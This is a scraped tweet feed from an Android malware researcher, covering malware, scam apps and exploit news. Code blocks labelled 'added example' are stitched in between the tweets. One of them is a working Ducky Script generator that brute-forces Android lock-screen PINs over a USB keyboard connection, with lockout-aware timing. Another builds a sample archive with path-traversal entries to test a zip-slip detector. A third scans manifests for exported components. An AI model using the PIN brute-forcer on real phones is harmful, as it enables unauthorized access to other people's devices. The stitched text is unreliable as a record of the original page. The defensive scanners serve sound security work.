Lukas Stefanko
@LukasStefanko
Malware Researcher at
Android security, malware analysis, app vulnerability research
t.me/androidMalware
youtube.com/c/LukasStefank
Lukas Stefanko’s Tweets
Hacking into Android in 32 seconds
A Samsung S7 is connected to a Pixel as an HID device (keyboard) that tries to brute-force the lock screen PIN and then download, install and launch a Metasploit payload.
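The keystroke side of the demo above, as an added example (this is not the author's script or any tool from the page): a generator that emits Rubber Ducky-style lines for a phone-as-HID-keyboard to type candidate PINs into an Android lock screen. The lockout model is an assumption, the classic 30-second pause after every 5 wrong attempts; the common-PIN list is a constructed, illustrative ordering rather than a real frequency table.

```python
"""Lockout-aware Ducky Script generator for a lock-screen PIN brute force.

Added example, not the page's or the author's code. Assumptions:
  * classic Android lockout: 30 s after every 5 failed attempts
  * a short constructed list of popular PINs tried first
"""
from typing import Iterable, List

# Constructed list of frequently chosen 4-digit PINs (illustrative order).
COMMON_PINS = ["1234", "1111", "0000", "1212", "7777", "1004", "2000", "4444"]

ATTEMPTS_BEFORE_LOCKOUT = 5   # assumption: classic Android behaviour
LOCKOUT_MS = 30_000           # assumption: 30 s lockout after 5 failures
TYPE_DELAY_MS = 500           # pause so the lock screen accepts each try


def pin_candidates(popular: Iterable[str], length: int = 4) -> Iterable[str]:
    """Yield popular PINs first, then the rest of the key space, no repeats."""
    seen = set()
    for pin in popular:
        if len(pin) == length and pin.isdigit() and pin not in seen:
            seen.add(pin)
            yield pin
    for n in range(10 ** length):
        pin = f"{n:0{length}d}"
        if pin not in seen:
            yield pin


def ducky_script(pins: Iterable[str], max_attempts: int) -> List[str]:
    """Return Ducky Script lines that type up to max_attempts PINs,
    inserting the lockout delay before every 6th, 11th, ... attempt."""
    lines = ["REM PIN brute force with lockout-aware delays",
             f"DELAY {TYPE_DELAY_MS}"]
    for i, pin in enumerate(pins):
        if i >= max_attempts:
            break
        if i and i % ATTEMPTS_BEFORE_LOCKOUT == 0:
            lines.append(f"DELAY {LOCKOUT_MS}")   # wait out the lockout
        lines += [f"STRING {pin}", "ENTER", f"DELAY {TYPE_DELAY_MS}"]
    return lines


def estimated_seconds(attempts: int) -> float:
    """Worst-case wall clock for `attempts` tries, lockouts included."""
    lockouts = (attempts - 1) // ATTEMPTS_BEFORE_LOCKOUT if attempts else 0
    return attempts * TYPE_DELAY_MS / 1000 + lockouts * LOCKOUT_MS / 1000


if __name__ == "__main__":
    script = ducky_script(pin_candidates(COMMON_PINS), max_attempts=12)
    print("\n".join(script))
    print(f"REM worst case ~{estimated_seconds(12):.0f}s for 12 attempts")
```

The arithmetic is the point: a 32-second win means the PIN sat in the first handful of guesses, because each block of five costs a 30-second lockout and the full 4-digit space costs hours. Newer Android releases escalate the lockout and many devices are set to wipe after a fixed number of failures, so treat the delay constants as inputs to tune, not facts.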
Covid Android Ransomware
If you installed the malicious Coronavirus Tracker app that locked your smartphone and requested a ransom, use the code "4865083501" to unlock it.
The key is hardcoded.
Quote Tweet
#ESETresearch ALERT: #COVID19 #Android #Ransomware: If you installed malicious Coronavirus Tracker app that locked your smartphone and requested ransom, use "4865083501" code to unlock it. Key is hardcoded. @LukasStefanko Details: domaintools.com/resources/blog
Android Trojan makes a PayPal payment on behalf of the user.
It sends $1,000 from the victim's account every time the user opens the PayPal app.
welivesecurity.com/2018/12/11/and
Don't install these apps from Google Play - it's malware.
Details:
-13 apps
-all together 560,000+ installs
-after launch, hides its own icon
-downloads an additional APK and makes the user install it (unavailable now)
-2 apps are #Trending
-no legitimate functionality
-reported
"Our data breach happened using a highly professional attack with sophisticated social engineering"
I just found the most honest "Virus Cleaner 2018" on Google Play. Not only does it detect itself as vulnerable, it also recommends that I uninstall it. #InstallOnlyReliableSecurityApps
How easy it is to make users believe apps are highly downloaded (popular) and probably worth trying.
These are not numbers of app installs; these are developer names.
Xiaomi now shows ads even in the Settings.
reddit.com/r/Android/comm
Looks like someone successfully created a PoC for the Android CVE-2019-2107 RCE.
PoC: You can own the mobile by watching a video with the payload. Should work on Android 7.0, 7.1.1, 7.1.2, 8.0, 8.1, 9.
github.com/marcinguy/CVE-
Have you ever seen two Android Banking Trojans beating each other for victim's credit card information? #Malware cc
Exploitation of LAN vulnerability found in Firefox for Android
I tested this PoC exploit on 3 devices on the same Wi-Fi; it worked pretty well.
I was able to open a custom URL on every smartphone using vulnerable Firefox (68.11.0 and below), found by gitlab.com/gitlab-com/gl-
Remotely Spying via #FaceTime
FaceTime anyone on iOS 12.1 or later and you can remotely spy on them (audio and video) before they accept the incoming call.
9to5mac.com/2019/01/28/fac
Courtesy of @BmManski
NetHunter Wi-Fi and Rubber Ducky mobile combo
The Android NetHunter kernel supports many popular external Wi-Fi chipsets, including a lot of cheap adapters.
Rubber Ducky works without any problems on both devices so far.
#TicWatchPro #OnePlus7
Another click farm in China with 8,000 devices generates fake engagement
So, let's wait for someone to hack it for the first time. Is its control panel on Shodan already?
From Matthew Brennan
Uninstall these apps!
15 apps with more than 400k+ installs in total found on Google Play.
These apps can download additional payload and display + click on "invisible" ads. Everything is hidden from user's view.
Mobile click farm, birthplace of fake engagement.
Fake impressions, boosts new social media trends, ad fraud, helps create influencers, leaves fake reviews, spreads likes, shares, installs apps...
twitter.com/EnglishRussia1
Scam iOS apps have been found on the Apple App Store tricking users into paying over $100.
The apps ask for a fingerprint right at the moment the payment pop-up shows, so the payment is accepted by the user's fingerprint.
welivesecurity.com/2018/12/03/sca
What is this app rating?
The developer created a tricky app icon to make potential users believe it has over 4 stars.
The purpose of the app is to trick the user into activating a 3-day trial for a basic photo editing app.
If the user forgets to cancel, it costs €49.99/week.
This is Bob. Bob doesn't care about his mobile privacy.
Bob:
- doesn't close private tabs
- doesn't close browser
- doesn't lock his device
- keeps it face up in his front pocket
- goes on public transport
- takes a nap
Don't be like Bob. Be smart.
How to create fake traffic jams in Google Maps with a bucket full of smartphones
Different perspective:
1) Buy mobile bots
2) Spoof GPS location
3) Control traffic
simonweckert.com/googlemapshack
Android Legitimate Spyware with 10M+ installs.
The #Onavo app, owned by Facebook, is a VPN service that collects your:
- mobile traffic
- location
- installed/opened apps
- visited websites
This app should hide your traffic & increase privacy; instead, it collects it.
Spoofing any website on Xiaomi's pre-installed browser
Be aware, it is NOT fixed yet and could be misused for phishing credentials.
Discovered by
andmp.com/2019/04/xiaomi
RCE in Adobe Acrobat Reader for Android (CVE-2021-40724)
$10,000 bounty received from GPSRP
Excellent exploitation and write-up by
Report: hulkvision.github.io/blog/post1/
Quick summary of how it was achieved 👇
Remove is not Uninstall
Found 3 apps on Google Play with over 700,000 installs that use an interesting persistence technique.
When the user realizes the app is not as described, they can only remove the app icon, not uninstall the app itself.
I explained how it works in the video:
Barcode Scanner app with 5,000,000+ installs became adware.
Should we now be afraid of even popular apps? Did the developer sell the app or take advantage?
-in 8 months app reached 5M+ installs
-after last update became adware
-uses own lockscreen
-displays ads
-removed from Google Play
Beware of another fake version of found on the Google Play Store with lots of fake positive reviews. It tries to steal the user's private key.
BTW there isn't any official MyEtherWallet on GP, yet. #reported
Replying to
Security without pentests: Home Alone edition 8⃣
Android malware can send WhatsApp messages from the infected device to spread itself + uses TOR.
What happened in the video:
-requests activation of the accessibility service
-activates device admin
-sets itself as the default SMS app
-downloads the payload
-downloads TOR
Found month ago by
Android banker found on Google Play with 10K+ installs has already stolen over 10,000 euros.
Video example of how it misuses accessibility services and overlays the banking app (1:09).
lukasstefanko.com/2018/09/bankin
A vulnerability in Google's Camera app allowed third-party apps to take pictures and video without the user's knowledge or the CAMERA permission.
This happened because of an exported CameraActivity that accepted input from other apps. CVE-2019-2234
checkmarx.com/blog/how-attac via
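The root cause above, an exported activity reachable by any app, is something you can check for statically before an attacker does. This added example (not Checkmarx's, Google's or the page's code) walks an AndroidManifest.xml and lists components that are exported, explicitly or implicitly, without an `android:permission` guard. The manifest it runs on is a constructed sample; the component names in it are illustrative, not those of the real Camera app.

```python
"""List exported Android components that any app can reach without a permission.

Added example, not the page's or any vendor's code. The manifest below is
constructed; names are illustrative.
"""
import xml.etree.ElementTree as ET
from typing import List, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def a(attr: str) -> str:
    """Qualified name for an android:attr attribute."""
    return f"{{{ANDROID_NS}}}{attr}"


SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.camera">
  <application>
    <!-- exported explicitly, no permission: reachable by any app -->
    <activity android:name=".CameraActivity" android:exported="true"/>
    <!-- implicitly exported: has an intent-filter, exported not set -->
    <activity android:name=".ShareActivity">
      <intent-filter><action android:name="android.intent.action.SEND"/></intent-filter>
    </activity>
    <!-- launcher entry: must be exported, so it is expected -->
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <!-- exported but guarded by a permission: fine -->
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.camera.PRIVATE"/>
    <!-- private component -->
    <receiver android:name=".BootReceiver" android:exported="false"/>
  </application>
</manifest>"""

COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")


def is_exported(elem: ET.Element) -> bool:
    """Pre-API-31 rule: exported if android:exported="true", or if the attribute
    is absent and the component declares an intent-filter. (Providers on very
    old targetSdk default to exported regardless; not modelled here.)"""
    explicit = elem.get(a("exported"))
    if explicit is not None:
        return explicit.lower() == "true"
    return elem.find("intent-filter") is not None


def is_launcher(elem: ET.Element) -> bool:
    """True if some intent-filter carries the LAUNCHER category."""
    for f in elem.findall("intent-filter"):
        cats = {c.get(a("name")) for c in f.findall("category")}
        if "android.intent.category.LAUNCHER" in cats:
            return True
    return False


def unguarded_exports(manifest_xml: str) -> List[Tuple[str, str, str]]:
    """Return (tag, name, reason) for exported components with no permission."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    for elem in app.iter():
        if elem.tag not in COMPONENTS or not is_exported(elem):
            continue
        if elem.get(a("permission")):
            continue                  # caller must hold a permission
        if is_launcher(elem):
            continue                  # the launcher entry is exported by design
        reason = "explicit" if elem.get(a("exported")) else "implicit (intent-filter)"
        findings.append((elem.tag, elem.get(a("name")), reason))
    return findings


if __name__ == "__main__":
    for tag, name, reason in unguarded_exports(SAMPLE_MANIFEST):
        print(f"{tag:9} {name:18} exported: {reason}")
```

Run it on the decoded manifest from apktool output. A hit only says the entry point is open; whether the input it accepts is dangerous (here, a start-recording action) still needs a look at the activity code. The fix is the usual one: `android:exported="false"`, a signature-level permission, or verifying the calling package before acting.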
I tested over 15 fake GPS Navigation apps with over 50,000,000 installs from #GooglePlay that violate Google rules.
These apps just open Google Maps or use its API without any additional value for the user, except for displaying ads.
Some of them don't even have a proper app icon.
Imagine, Android ransomware that could lock you out of your car.
If the smart key app is installed, then triple the ransom.
twitter.com/somospostpc/st
Android Trojan controlled via Telegram spies on Iranian users. Can take pics, make calls, send SMS, steal data. #Iran
news.drweb.com/show/?i=11331&
Would you use an antivirus that detects itself as a risky app?
This Fake Antivirus 2019 uses only a blacklist & whitelist of app package names + a permissions check. Still forgot to whitelist itself.
Using the free antivirus software that comes with your computer.
0-click RCE via MMS exploit for Samsung's Android OS versions O(8.x), P(9.0) and Q(10.0) #Fuzzing CVE-2020-8899
googleprojectzero.blogspot.com/2020/07/mms-ex
Demo: youtu.be/ZQnb8kRMkHg
APKLeaks in action
Handy utility that dumps IPs, URLs, URIs or secrets from an analyzed Android app.
Now you know where backups are stored, and maybe test these ZIPs for DIR traversal 👇
github.com/dwisiswant0/ap by
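The "test these ZIPs for DIR traversal" step, as an added example that is not APKLeaks' code or the page's: a checker that flags archive entries which would escape the extraction directory (the zip-slip pattern), followed by an extract function that refuses such archives. The backup archive is constructed in memory; `/tmp/restore` is an assumed destination.

```python
"""Flag ZIP entries that escape the extraction directory (zip-slip).

Added example, not APKLeaks' or the page's code. The archive is built in
memory with constructed entries; /tmp/restore is an assumed destination.
"""
import io
import os
import posixpath
import zipfile
from typing import List


def build_sample_zip() -> bytes:
    """Constructed backup.zip: one benign entry and three hostile ones."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("backup/settings.json", '{"theme": "dark"}')
        z.writestr("../../../../data/data/com.example/shared_prefs/creds.xml", "<map/>")
        z.writestr("/etc/hosts", "127.0.0.1 evil")
        z.writestr("backup/..\\..\\win.ini", "[x]")     # backslash variant
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes, dest: str = "/tmp/restore") -> List[str]:
    """Return entry names that resolve outside `dest` after normalisation."""
    dest_abs = os.path.normpath(os.path.abspath(dest))
    bad = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for name in z.namelist():
            # Some extractors treat backslashes as separators; assume the worst.
            norm = name.replace("\\", "/")
            if posixpath.isabs(norm) or norm.startswith("//"):
                bad.append(name)          # absolute path: would ignore dest
                continue
            target = os.path.normpath(os.path.join(dest_abs, norm))
            if os.path.commonpath([dest_abs, target]) != dest_abs:
                bad.append(name)          # climbed above dest via ".."
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Extract only if every entry stays inside dest; return the names written."""
    if unsafe_entries(zip_bytes, dest):
        raise ValueError("archive contains path traversal entries")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        z.extractall(dest)
        return z.namelist()


if __name__ == "__main__":
    for entry in unsafe_entries(build_sample_zip()):
        print("UNSAFE:", entry)
```

Point the checker at a ZIP the app downloads or restores (the backup URLs APKLeaks surfaces are a good start). If the app's own restore code extracts such an archive without this kind of check, an attacker who can swap the archive writes into arbitrary paths inside the app sandbox, which is the finding worth reporting.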
Demo of Binance wallet theft using Accessibility services
Android PoC malware misuses accessibility to take control of the device and withdraw Bitcoins without any user interaction.
Binance swiftly fixed the issue.
Research & video by
Paper: link.springer.com/chapter/10.100
The first Android Crypto-Ransomware that misuses accessibility services + encrypts data + changes PIN. #DoubleLocker
welivesecurity.com/2017/10/13/dou
Today I found 22 apps containing adware still available on Google Play with altogether 3.2M+ installs.
These apps hide after launch and display fullscreen ads every time the user unlocks the device.
Steps on how to identify & remove such adware in the video (1:36)
Android SMS Worm spreads in #India 🇮🇳
-spreads via SMS and WhatsApp as "Free 25GB Offer" app
-only for Jio customers
Goal: spread & ads monetization
The app sends SMS in the background to contacts if they have a Jio number prefix.
Demo: Download + Install + Open
Found by
Android malware analysis + OSINT
How I tracked down the developer of 42 Android adware apps on Google Play with 8,000,000+ installs.
welivesecurity.com/2019/10/24/tra
Trojanized #WhatsApp and #Telegram apps replace cryptocurrency wallet addresses in messages
Some of them use OCR to recognize mnemonic phrase text from screenshots and photos stored on the devices to steal cryptocurrency funds
welivesecurity.com/2023/03/16/not #Android #Windows
Google Pixel did really well and wasn't successfully pwned at mobile #Pwn2Own.
We can't say that about the iPhone. Apparently Adrian was right.
After a couple of requests I created a Telegram channel.
To stay up to date with mobile security, feel free to join and share.
Topics: Security & privacy, malware on Google Play, vulnerabilities, bug bounty hunting, security tips, tutorials, penetration testing..
The First Android cryptocurrency clipboard exchanger found on Google Play.
Its goal is to change the copied address of the recipient's cryptocurrency wallet to the attacker's.
The malware also impersonates service and lures out the PK, password or phrase.
welivesecurity.com/2019/02/08/fir
Replying to
My similar "security without pentests" collection:
Quote Tweet
This is how Android malware steals the recovery phrase from Trust Crypto Wallet without user interaction and restricts access to the victim's smartphone by blocking all actions such as removing it and seeing any unauthorized withdrawals
Full demo: youtu.be/cI9GbhspMYY
Quote Tweet
Some kind of crypto wallet stealer which sends your keys via Telegram. Also includes a C2 URL.
Low detection: virustotal.com/gui/file/6f899
cc @malwrhunterteam
More ATMs in Indonesia infected by #WannaCry. Updated picture collection from infected countries [60 pics]
b0n1.blogspot.com/2017/05/wannac
Replying to
How to prevent this from happening:
-charge your smartphone using your own adapter if possible
-don't use a trivial PIN or password for lock screen protection
-use mobile security software that will detect the Metasploit payload
Android WhatsApp Worm?
Malware spreads via the victim's WhatsApp by automatically replying to any received WhatsApp message notification with a link to a malicious Huawei Mobile app.
The message is sent only once per hour to the same contact.
It looks to be adware or a subscription scam.
How Google verifies apps before uploading them to the Play Store
How to uninstall "invisible icon" app?
App with 500K+ installs found on Google Play using the "invisible icon" trick to stay hidden from the user's view.
This app is not malicious, but this simple trick can be easily misused in the future. #DiscloseApp
Almost every Android phone - except for Pixel - is still vulnerable to this RCE bug.
That's because manufacturers don't push security updates right away.
BTW, Samsung devices are the most popular unpatched phones on the planet.
CSRF + XSS + SMS spoofing + Android deep link URL redirection
Great example of chaining low impact vulnerabilities in #TikTok to remotely manipulate account content
-delete user video
-upload user video
-make "private" videos "public"
research.checkpoint.com/2020/tik-or-to via
Scareware YouTube ad techniques ("Your Phone has Virus ⚠️") are misused to promote a lousy Android antivirus app.
BTW, this app has 100K+ installs and has been available on Google Play only since Jul 5, 2019, without any reference or web site.
P.S. So, my phone has 13 or 23 viruses?
Whenever you ask #infosec community on Twitter if you should disclose new vulnerability. #ESETAppWatch
SMS worm impersonates Covid-19 vaccine free registration
Android SMS worm tries to spread via text messages as fake free registration for Covid-19 vaccine - targets India 🇮🇳
It can spread itself via SMS to the victim's contacts with a link to download this malware.
Quote Tweet
"Covid-19.apk" seen from India: 5522a7cc358b4193eac53e620d3baa47f385a04bf3d15d1850076cce9456d5f4
Don't be quiet, no matter who is listening.
Recently discovered Android banking Trojan on Google Play by had a malicious package name containing my name and a hi_there message for me.
If you are reading this, next time I want my profile_pic signed by you in there. :)
I just finished the Web Security Academy labs.
It's a great learning source with free training + labs to test your skills:
-SQL injection
-XSS
-OS command injection
-DIR traversal
Hope we can expect more topics to come.
portswigger.net/web-security